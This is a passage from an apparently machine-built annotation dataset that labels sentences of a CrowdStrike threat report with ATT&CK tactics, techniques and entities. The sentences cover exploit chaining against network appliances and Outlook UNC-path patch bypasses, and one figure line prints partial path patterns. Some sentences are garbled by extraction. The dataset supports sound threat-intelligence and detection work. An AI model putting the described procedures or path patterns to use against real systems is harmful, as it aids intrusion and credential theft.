throughout 2024.", "sentence_text": "Network appliances are attractive targets for many threat actors due to their many unresolved security shortcomings and often deliberate exposure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s301-471106", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 301, "context_before": "Network appliances are attractive targets for many threat actors due to their many unresolved security shortcomings and often deliberate exposure.", "sentence_text": "Many exploits observed in 2024 demonstrate that threat actors are leveraging previously established attack vectors and components to repeatedly exploit the same products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s302-a39022", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 302, "context_before": "Many exploits observed in 2024 demonstrate that threat actors are leveraging previously established attack vectors and components to repeatedly exploit the same products.", "sentence_text": "Attackers almost certainly prefer to target vulnerabilities that directly allow for unauthenticated remote code execution (RCE) and seek to improve their chances for success with creative and resourceful approaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s303-63ae6f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 303, "context_before": "Attackers almost certainly prefer to target vulnerabilities that directly allow for unauthenticated remote code execution (RCE) and seek to improve their chances for success with creative and resourceful approaches.", "sentence_text": "In 2024, attackers increasingly achieved RCE using two layered approaches:\n• Chaining exploits: Combining two or more exploits to compose an attack sequence, which increases their capabilities and impact on the target systems • Abusing legitimate features: While exploits often enable initial access, attackers sometimes rely on product features, such as integrated command shells, to enable RCE Methods to Achieve Remote Code Execution EXPLOIT", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Attackers achieve remote code execution by chaining multiple exploits or abusing legitimate system features such as command shells.", "entities": [ { "text": "attackers", "start": 9, "end": 18, "label": "ThreatActor" }, { "text": "achieved RCE using two layered approaches", "start": 32, "end": 73, "label": "Action" }, { "text": "Combining two or more exploits to compose an attack sequence", "start": 96, "end": 156, "label": "Action" }, { "text": "rely on product features, such as integrated command shells, to enable RCE", "start": 321, "end": 395, "label": "Action" }, { "text": "integrated command shells", "start": 355, "end": 380, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s304-4e5015", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 304, "context_before": "In 2024, attackers increasingly achieved RCE using two layered approaches:\n• Chaining exploits: Combining two or more exploits to compose an attack sequence, which increases their capabilities and impact on the target systems • Abusing legitimate features: While exploits often enable initial access, attackers sometimes rely on product features, such as integrated command shells, to enable RCE Methods to Achieve Remote Code Execution EXPLOIT", "sentence_text": "A INITIAL COMPROMISE EXPLOIT B ABUSING LEGITIMATE FEATURES, SUCH AS INTEGRATED EXPLOIT CHAINING:\nCOMMAND SHELLS EXPLOIT A AND EXPLOIT B RCE RCE Exploit Chaining In November 2024, two notable incidents exemplified the effectiveness of exploit chains.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s305-461c32", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 305, "context_before": "A INITIAL COMPROMISE EXPLOIT B ABUSING LEGITIMATE FEATURES, SUCH AS INTEGRATED EXPLOIT CHAINING:\nCOMMAND SHELLS EXPLOIT A AND EXPLOIT B RCE RCE Exploit Chaining In November 2024, two notable incidents exemplified the effectiveness of exploit chains.", "sentence_text": "Multiple unattributed threat actors chained a bypass vulnerability (CVE-2024-0012) and privilege escalation vulnerability (CVE-2024-9474) in the Management Web Interface of Palo Alto Networks PAN-OS software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Chain a bypass vulnerability and a privilege escalation vulnerability in the PAN-OS Management Web Interface.", "entities": [ { "text": "Multiple unattributed threat actors", "start": 0, "end": 35, "label": "ThreatActor" }, { "text": "chained a bypass vulnerability (CVE-2024-0012) and privilege escalation vulnerability (CVE-2024-9474)", "start": 36, "end": 137, "label": "Action" }, { "text": "CVE-2024-0012", "start": 68, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-9474", "start": 123, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "Management Web Interface of Palo Alto Networks PAN-OS software", "start": 145, "end": 207, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s306-b3870d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 306, "context_before": "Multiple unattributed threat actors chained a bypass vulnerability (CVE-2024-0012) and privilege escalation vulnerability (CVE-2024-9474) in the Management Web Interface of Palo Alto Networks PAN-OS software.", "sentence_text": "The same month, CrowdStrike Services investigated a separate campaign in which China-nexus adversary OPERATOR PANDA likely chained two Cisco IOS vulnerabilities — a privilege escalation vulnerability (CVE-2023-20198) and a command injection vulnerability (CVE-2023-20273) — to target U.S. telecom and professional services entities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1068", "name": "Exploitation for Privilege Escalation" } ], "procedure": "OPERATOR PANDA chained Cisco IOS vulnerabilities (CVE-2023-20198 and CVE-2023-20273) to exploit systems and target telecom and professional services entities.", "entities": [ { "text": "OPERATOR PANDA", "start": 101, "end": 115, "label": "ThreatActor" }, { "text": "chained two Cisco IOS vulnerabilities", "start": 123, "end": 160, "label": "Action" }, { "text": "CVE-2023-20198", "start": 201, "end": 215, "label": "Infrastructure_Indicator" }, { "text": "CVE-2023-20273", "start": 256, "end": 270, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s307-6a9e2b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 307, "context_before": "The same month, CrowdStrike Services investigated a separate campaign in which China-nexus adversary OPERATOR PANDA likely chained two Cisco IOS vulnerabilities — a privilege escalation vulnerability (CVE-2023-20198) and a command injection vulnerability (CVE-2023-20273) — to target U.S. telecom and professional services entities.", "sentence_text": "These examples also highlight another theme observed throughout 2024:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s308-3e68e4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 308, "context_before": "These examples also highlight another theme observed throughout 2024:", "sentence_text": "Threat actors are leveraging vulnerabilities within the network appliance’s they potentially allow attackers to leverage one vulnerability to target multiple products running the same OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s309-e7ec2a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 309, "context_before": "Threat actors are leveraging vulnerabilities within the network appliance’s they potentially allow attackers to leverage one vulnerability to target multiple products running the same OS.", "sentence_text": "These proprietary OSs are often reachable via internet-exposed management interfaces and provide an easily identifiable attack vector, making them increasingly attractive targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s310-aeb0f0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 310, "context_before": "These proprietary OSs are often reachable via internet-exposed management interfaces and provide an easily identifiable attack vector, making them increasingly attractive targets.", "sentence_text": "Chaining two or more vulnerabilities offers attackers additional advantages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s311-1ffd65", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 311, "context_before": "Chaining two or more vulnerabilities offers attackers additional advantages.", "sentence_text": "First, it allows attackers to achieve their primary objective, unauthenticated RCE, by combining multiple exploits into one seamless attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s312-07ff34", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 312, "context_before": "First, it allows attackers to achieve their primary objective, unauthenticated RCE, by combining multiple exploits into one seamless attack.", "sentence_text": "These vulnerabilities can often be packaged into a single request or exploit payload with minimal complexity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s313-89b341", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 313, "context_before": "These vulnerabilities can often be packaged into a single request or exploit payload with minimal complexity.", "sentence_text": "Second, exploit chaining undermines the severity score-based patching process that many enterprises follow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s314-cd4cab", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 314, "context_before": "Second, exploit chaining undermines the severity score-based patching process that many enterprises follow.", "sentence_text": "While the pre-authentication vulnerabilities receive out-of-band patches and are typically prioritized for deployment, associated post-authentication exploits receive less attention and may be ignored, potentially allowing the exploit to be chained with a different vulnerability at a later date to again achieve RCE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s315-cc9a8f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 315, "context_before": "While the pre-authentication vulnerabilities receive out-of-band patches and are typically prioritized for deployment, associated post-authentication exploits receive less attention and may be ignored, potentially allowing the exploit to be chained with a different vulnerability at a later date to again achieve RCE.", "sentence_text": "Over time, this approach potentially increases the efficiency of RCE exploit chain development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s316-0aea5a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 316, "context_before": "Over time, this approach potentially increases the efficiency of RCE exploit chain development.", "sentence_text": "Unless the vendor addresses the root cause of multiple vulnerabilities, threat actors can repurpose similar techniques and quickly develop alternatives that bypass initial mitigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s317-adaf39", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 317, "context_before": "Unless the vendor addresses the root cause of multiple vulnerabilities, threat actors can repurpose similar techniques and quickly develop alternatives that bypass initial mitigations.", "sentence_text": "Chaining exploits can complicate efforts to efficiently remediate vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s318-004e2a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 318, "context_before": "Chaining exploits can complicate efforts to efficiently remediate vulnerabilities.", "sentence_text": "Understanding the combined effects of exploit chaining often requires more analysis in addition to patching vulnerabilities ahead of traditional timelines, potentially resulting in patching fatigue.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s319-719a1e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 319, "context_before": "Understanding the combined effects of exploit chaining often requires more analysis in addition to patching vulnerabilities ahead of traditional timelines, potentially resulting in patching fatigue.", "sentence_text": "Security teams typically prioritize patching internet-facing services before other internal processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s320-5781ba", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 320, "context_before": "Security teams typically prioritize patching internet-facing services before other internal processes.", "sentence_text": "However, depending on the specific exploit chain, certain internal-facing vulnerabilities (such as post-authentication flaws) may need to be prioritized, which may strain security teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p35-s321-c49c56", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 35, "sentence_id": 321, "context_before": "However, depending on the specific exploit chain, certain internal-facing vulnerabilities (such as post-authentication flaws) may need to be prioritized, which may strain security teams.", "sentence_text": "Abusing Legitimate Features Enables Effective Exploitation Throughout 2024, threat actors combined vulnerability exploitation with legitimate feature abuse to achieve unauthenticated RCE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s322-007250", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 322, "context_before": "Abusing Legitimate Features Enables Effective Exploitation Throughout 2024, threat actors combined vulnerability exploitation with legitimate feature abuse to achieve unauthenticated RCE.", "sentence_text": "Continuing the Discovery, Rediscovery, and Circumvention Trend Threat actors continued to focus on previously established attack vectors and targeted similar components to achieve exploitation in 2024, continuing a trend first observed in the CrowdStrike 2023 Global Threat Report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s323-ffd6b8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 323, "context_before": "Continuing the Discovery, Rediscovery, and Circumvention Trend Threat actors continued to focus on previously established attack vectors and targeted similar components to achieve exploitation in 2024, continuing a trend first observed in the CrowdStrike 2023 Global Threat Report.", "sentence_text": "In several 2024 incidents, threat actors leveraged their expertise in particular products to exploit those devices via one or more zero-day vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit devices using one or more zero-day vulnerabilities based on expertise in specific products.", "entities": [ { "text": "threat actors", "start": 27, "end": 40, "label": "ThreatActor" }, { "text": "leveraged their expertise in particular products to exploit those devices via one or more zero-day vulnerabilities", "start": 41, "end": 155, "label": "Action" }, { "text": "zero-day vulnerabilities", "start": 131, "end": 155, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s324-179b3b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 324, "context_before": "In several 2024 incidents, threat actors leveraged their expertise in particular products to exploit those devices via one or more zero-day vulnerabilities.", "sentence_text": "For example, in September 2024, an unknown threat actor exploited and chained a zero-day file disclosure vulnerability (CVE-2024-21287) to obtain plaintext credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1552", "name": "Unsecured Credentials" } ], "procedure": "Exploit and chain a zero-day file disclosure vulnerability to obtain plaintext credentials.", "entities": [ { "text": "unknown threat actor", "start": 35, "end": 55, "label": "ThreatActor" }, { "text": "exploited and chained a zero-day file disclosure vulnerability (CVE-2024-21287) to obtain plaintext credentials", "start": 56, "end": 167, "label": "Action" }, { "text": "CVE-2024-21287", "start": 120, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "plaintext credentials", "start": 146, "end": 167, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s325-d4f0ef", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 325, "context_before": "For example, in September 2024, an unknown threat actor exploited and chained a zero-day file disclosure vulnerability (CVE-2024-21287) to obtain plaintext credentials.", "sentence_text": "This allowed them to target a deserialization vulnerability (CVE-2024-20953) to compromise and execute code.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Target a deserialization vulnerability to compromise the system and execute code.", "entities": [ { "text": "target a deserialization vulnerability (CVE-2024-20953) to compromise and execute code", "start": 21, "end": 107, "label": "Action" }, { "text": "CVE-2024-20953", "start": 61, "end": 75, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s326-5819a6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 326, "context_before": "This allowed them to target a deserialization vulnerability (CVE-2024-20953) to compromise and execute code.", "sentence_text": "Though CVE-2024-20953 had been disclosed prior to this incident, neither an exploit nor substantive technical details were publicly available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s327-8e8114", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 327, "context_before": "Though CVE-2024-20953 had been disclosed prior to this incident, neither an exploit nor substantive technical details were publicly available.", "sentence_text": "Despite this, an unknown threat actor successfully reproduced a functional n-day exploit for CVE-2024-20953 and chained it with a zero-day vulnerability (CVE-2024-21287).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Reproduce a functional n-day exploit for CVE-2024-20953 and chain it with a zero-day vulnerability, CVE-2024-21287.", "entities": [ { "text": "unknown threat actor", "start": 17, "end": 37, "label": "ThreatActor" }, { "text": "successfully reproduced a functional n-day exploit for CVE-2024-20953 and chained it with a zero-day vulnerability (CVE-2024-21287)", "start": 38, "end": 169, "label": "Action" }, { "text": "CVE-2024-20953", "start": 93, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-21287", "start": 154, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s328-31292a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 328, "context_before": "Despite this, an unknown threat actor successfully reproduced a functional n-day exploit for CVE-2024-20953 and chained it with a zero-day vulnerability (CVE-2024-21287).", "sentence_text": "This incident indicates the threat actor had specialized product knowledge, which allowed them to identify a new vulnerability and ultimately compromise these devices and conduct follow-on malicious activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s329-318e93", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 329, "context_before": "This incident indicates the threat actor had specialized product knowledge, which allowed them to identify a new vulnerability and ultimately compromise these devices and conduct follow-on malicious activity.", "sentence_text": "Another example of threat actors using previously established attack vectors involves the Windows local privilege escalation vulnerabilities in the mskssrv driver.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s330-375a5f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 330, "context_before": "Another example of threat actors using previously established attack vectors involves the Windows local privilege escalation vulnerabilities in the mskssrv driver.", "sentence_text": "During the Pwn2Own Vancouver event in March 2023, the offensive security company Synacktiv exploited a logical vulnerability in the mskssrv driver (CVE-2023-29360) to escalate privileges to SYSTEM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s331-08bd7a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 331, "context_before": "During the Pwn2Own Vancouver event in March 2023, the offensive security company Synacktiv exploited a logical vulnerability in the mskssrv driver (CVE-2023-29360) to escalate privileges to SYSTEM.", "sentence_text": "JUNE 11, 2024 JULY 9, 2024 AUGUST 13, 2024 SEPTEMBER 10, 2024 OCTOBER 8, 2024 OCTOBER 13, 2024 MARCH 23, 2023 Industry researcher releases POC exploit for Synacktiv exploits zero-day vulnerability CVE-2024-35250 based on DEVCORE's research (CVE-2023-29360) during Pwn2Own Vancouver OCTOBER 15, 2024 SEPTEMBER 12, 2023", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p36-s332-3eadbe", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 36, "sentence_id": 332, "context_before": "JUNE 11, 2024 JULY 9, 2024 AUGUST 13, 2024 SEPTEMBER 10, 2024 OCTOBER 8, 2024 OCTOBER 13, 2024 MARCH 23, 2023 Industry researcher releases POC exploit for Synacktiv exploits zero-day vulnerability CVE-2024-35250 based on DEVCORE's research (CVE-2023-29360) during Pwn2Own Vancouver OCTOBER 15, 2024 SEPTEMBER 12, 2023", "sentence_text": "OCT NOV Exploited in the wild KEY 2023 2024", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s333-00f266", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 333, "context_before": "OCT NOV Exploited in the wild KEY 2023 2024", "sentence_text": "Disclosing a vulnerability, particularly one acknowledged as exploited in the wild, highlights potentially viable mechanisms for future exploitation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s334-6584d5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 334, "context_before": "Disclosing a vulnerability, particularly one acknowledged as exploited in the wild, highlights potentially viable mechanisms for future exploitation.", "sentence_text": "For example, in September 2024, CrowdStrike Intelligence observed multiple POST requests consistent with exploiting a direct request vulnerability in Apache OFBiz (CVE-2024-45195).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Threat actors sent crafted POST requests to exploit a direct request vulnerability in Apache OFBiz (CVE-2024-45195).", "entities": [ { "text": "POST requests consistent with exploiting a direct request vulnerability", "start": 75, "end": 146, "label": "Action" }, { "text": "Apache OFBiz", "start": 150, "end": 162, "label": "Infrastructure_Indicator" }, { "text": "CVE-2024-45195", "start": 164, "end": 178, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s335-d5030d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 335, "context_before": "For example, in September 2024, CrowdStrike Intelligence observed multiple POST requests consistent with exploiting a direct request vulnerability in Apache OFBiz (CVE-2024-45195).", "sentence_text": "These POST requests mirrored CVE-2024-45195 exploitation guidance that a well-known industry source had published two weeks earlier.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s336-ecbd3b", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 336, "context_before": "These POST requests mirrored CVE-2024-45195 exploitation guidance that a well-known industry source had published two weeks earlier.", "sentence_text": "CVE-2024-45195 results from the option to desynchronize the requestUri and overrideViewUri variables in the RequestHandler component of the OFBiz Java application logic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s337-afc557", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 337, "context_before": "CVE-2024-45195 results from the option to desynchronize the requestUri and overrideViewUri variables in the RequestHandler component of the OFBiz Java application logic.", "sentence_text": "CVE-2024-45195 is similar to earlier vulnerabilities (CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856) that also exploited desynchronization capabilities to allow unauthorized users to bypass authentication mechanisms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s338-44a1b4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 338, "context_before": "CVE-2024-45195 is similar to earlier vulnerabilities (CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856) that also exploited desynchronization capabilities to allow unauthorized users to bypass authentication mechanisms.", "sentence_text": "Though the vendor has provided multiple patches and several industry sources have publicly discussed these vulnerabilities, the core flaw persists and allows attackers to manipulate the controller-view state.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s339-0d6f63", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 339, "context_before": "Though the vendor has provided multiple patches and several industry sources have publicly discussed these vulnerabilities, the core flaw persists and allows attackers to manipulate the controller-view state.", "sentence_text": "Separately, in January 2024, CrowdStrike Intelligence assessed threat actors had almost certainly leveraged CVE-2023-29324 in recent spear-phishing operations.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Threat actors leveraged CVE-2023-29324 as part of spear-phishing operations to gain initial access.", "entities": [ { "text": "threat actors", "start": 63, "end": 76, "label": "ThreatActor" }, { "text": "leveraged CVE-2023-29324", "start": 98, "end": 122, "label": "Action" }, { "text": "CVE-2023-29324", "start": 108, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "spear-phishing operations", "start": 133, "end": 158, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s340-497427", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 340, "context_before": "Separately, in January 2024, CrowdStrike Intelligence assessed threat actors had almost certainly leveraged CVE-2023-29324 in recent spear-phishing operations.", "sentence_text": "CVE-2023-29324 bypasses Microsoft’s mitigations for a previously disclosed very likely exploited since at least March 2022 to target organizations in multiple regions and sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s341-0ee6c3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 341, "context_before": "CVE-2023-29324 bypasses Microsoft’s mitigations...", "sentence_text": "An attacker can trigger both bypasses by inserting a Universal Naming Convention path into either a Server Message Block (TCP 445) or WebDAV share on an attacker-controlled server into the MAPI property named PidLidReminderFileParameter (Figure 18).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "The attacker triggers authentication bypass by inserting a UNC path into a MAPI property referencing an attacker-controlled server.", "entities": [ { "text": "attacker", "start": 3, "end": 11, "label": "ThreatActor" }, { "text": "trigger both bypasses by inserting a Universal Naming Convention path into either a Server Message Block (TCP 445) or WebDAV share on an attacker-controlled server", "start": 16, "end": 179, "label": "Action" }, { "text": "Server Message Block (TCP 445)", "start": 100, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "WebDAV share", "start": 134, "end": 146, "label": "Infrastructure_Indicator" }, { "text": "attacker-controlled server", "start": 153, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p37-s342-6daaf2", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 37, "sentence_id": 342, "context_before": "An attacker can trigger both bypasses by inserting a Universal Naming Convention path into either a Server Message Block (TCP 445) or WebDAV share on an attacker-controlled server into the MAPI property named PidLidReminderFileParameter (Figure 18).", "sentence_text": "CVE-2023-23397 \\\\\\.wav CVE-2023-29324 \\\\.\\UNC\\\\\\.wav CVE-2023-35384 \\\\./UNC/C://..//.wav CVE-2023-29324, and CVE-2023-35384 exploitation", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s343-b77504", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 343, "context_before": "CVE-2023-23397 \\\\\\.wav CVE-2023-29324 \\\\.\\UNC\\\\\\.wav CVE-2023-35384 \\\\./UNC/C://..//.wav CVE-2023-29324, and CVE-2023-35384 exploitation", "sentence_text": "Whether threat actors have used either bypass in 2024 is unknown.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s344-eba701", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 344, "context_before": "Whether threat actors have used either bypass in 2024 is unknown.", "sentence_text": "However, these vulnerabilities underscore that circumventing mitigations from earlier patches to target the same vulnerable components is often trivial.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s345-a658ba", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 345, "context_before": "However, these vulnerabilities underscore that circumventing mitigations from earlier patches to target the same vulnerable components is often trivial.", "sentence_text": "These trends highlight threat actors’ evolving tactics and the challenges involved in effectively addressing vulnerabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s346-55fc0c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 38, "sentence_id": 346, "context_before": "These trends highlight threat actors’ evolving tactics and the challenges involved in effectively addressing vulnerabilities.", "sentence_text": "Much of the exploitation activity discussed in this report occurred after the vulnerabilities were publicly disclosed and patches became available.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p38-s347-1548d9", "source": "crowdstrike", "doc_id": 